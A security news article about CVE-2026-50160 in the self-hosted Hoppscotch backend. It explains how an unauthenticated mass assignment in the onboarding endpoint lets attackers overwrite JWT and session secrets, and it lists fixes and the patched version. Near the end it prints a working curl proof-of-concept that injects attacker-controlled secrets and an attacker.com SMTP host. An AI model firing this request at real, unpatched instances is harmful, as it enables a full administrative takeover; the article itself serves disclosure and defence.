A critical security vulnerability, identified as CVE-2026-50160, has been discovered in the self-hosted Hoppscotch backend.
This vulnerability allows unauthenticated attackers to overwrite sensitive configuration values, including the JWT signing secret, which can ultimately lead to a complete administrative takeover of affected instances.
The issue is documented in the GitHub advisory GHSA-j542-4rch-8hwf and impacts all versions up to 2026.4.1. It has been patched in version 2026.5.0. The flaw carries a maximum CVSS score of 10.0 due to its ease of exploitation and the extent of potential compromise.
Critical Hoppscotch Vulnerability
The vulnerability stems from a mass assignment flaw in the POST /v1/onboarding/config endpoint, which is accessible without authentication during the initial setup phase when no users exist (usersCount === 0).
This endpoint is intended to configure onboarding parameters such as SMTP and OAuth settings; however, due to improper input validation, attackers can inject arbitrary configuration keys that are not explicitly defined in the expected request DTO.
At the core of the issue is the misuse of NestJS ValidationPipe without enabling the allowlist option. As a result, additional properties supplied in the request body are not stripped and are passed directly into the application logic.
These properties are then processed using Object.entries(dto), which blindly iterates over all supplied keys without enforcing any restrictions. Critically, sensitive configuration keys such as JWT_SECRET and SESSION_SECRET are valid internal enum values, allowing attacker-supplied values to be accepted and stored.
Further compounding the issue, the validateEnvValues logic fails to reject unauthorized keys explicitly. Instead, unrecognized entries fall through a default: break condition, effectively bypassing validation.
Combined with the lack of authentication on the onboarding endpoint, these weaknesses create a perfect attack chain enabling complete system compromise.
In a successful attack scenario, an adversary can overwrite the JWT_SECRET with a value they control, allowing them to forge valid authentication tokens for any user, including administrators.
Since token verification relies on this secret, all JwtAuthGuard protections become ineffective. Attackers can then impersonate users, access sensitive data, extract API keys, and maintain persistent access even after credential resets. Additionally, overwriting SESSION_SECRET enables session hijacking and invalidation of legitimate user sessions.
The vulnerability is particularly dangerous because it targets freshly deployed instances that are often exposed to the internet before onboarding is complete. This narrow window represents a high-risk period where automated scanning or opportunistic attackers can easily exploit the flaw.
Proof-of-concept exploitation is straightforward and requires only a single crafted HTTP request. Below is a working example demonstrating how an attacker can inject malicious configuration values:
# Step 1: Check onboarding status
curl http://target:3170/v1/onboarding/status
# Step 2: Exploit mass assignment to overwrite secrets
curl -X POST http://target:3170/v1/onboarding/config
-H "Content-Type: application/json"
-d '{
"VITE_ALLOWED_AUTH_PROVIDERS": "EMAIL",
"MAILER_SMTP_ENABLE": "true",
"MAILER_SMTP_URL": "smtp://attacker.com:25",
"MAILER_ADDRESS_FROM": "[email protected]",
"JWT_SECRET": "ATTACKER_CONTROLLED_JWT_SECRET",
"SESSION_SECRET": "ATTACKER_CONTROLLED_SESSION"
}'
# Step 3: Verify compromise (database check)
psql -c "SELECT name, value FROM InfraConfig WHERE name="JWT_SECRET";"Successful exploitation results in the backend storing attacker-controlled secrets, enabling token forgery and persistent unauthorized access.
Security researchers attribute the issue to CWE-915 (Improperly Controlled Modification of Dynamically-Determined Object Attributes), a common but dangerous class of vulnerabilities in modern API frameworks.
The advisory highlights that enabling whitelist: true in ValidationPipe would have prevented the attack entirely by stripping unknown fields. Additional recommended mitigations include strict allowlisting of configuration keys, explicit validation rejection for sensitive parameters, and enforcing authentication or one-time setup tokens for onboarding endpoints.
Organizations running self-hosted Hoppscotch instances are strongly advised to upgrade immediately to version 2026.5.0 or later. Until patched, instances exposed during initial setup remain critically vulnerable to remote compromise with no user interaction required.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
